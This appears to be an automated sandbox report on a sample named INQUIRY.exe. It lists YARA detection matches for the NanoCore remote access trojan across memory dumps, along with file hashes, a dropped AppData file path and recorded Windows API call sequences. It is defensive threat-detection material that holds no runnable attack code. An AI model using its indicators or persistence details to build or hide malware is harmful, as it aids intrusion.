      Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.735138898.0000000004982000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.734386129.0000000000625000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.734985665.00000000037A1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000000.718272419.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: INQUIRY.exe PID: 6904, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: INQUIRY.exe PID: 7084, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: rstmgknbahw.exe PID: 1904, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: rstmgknbahw.exe PID: 5320, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_00403225
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_00403225
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_0040604C1_2_0040604C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004047721_2_00404772
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_021A0B881_2_021A0B88
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_0040A2A54_2_0040A2A5
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_025538504_2_02553850
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_025523A04_2_025523A0
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_02552FA84_2_02552FA8
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_0255306F4_2_0255306F
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_0040A2A54_1_0040A2A5
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_0040604C5_2_0040604C
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_004047725_2_00404772
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_0040A2A56_2_0040A2A5
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_00AB07006_2_00AB0700
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_049E2FA86_2_049E2FA8
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_049E23A06_2_049E23A0
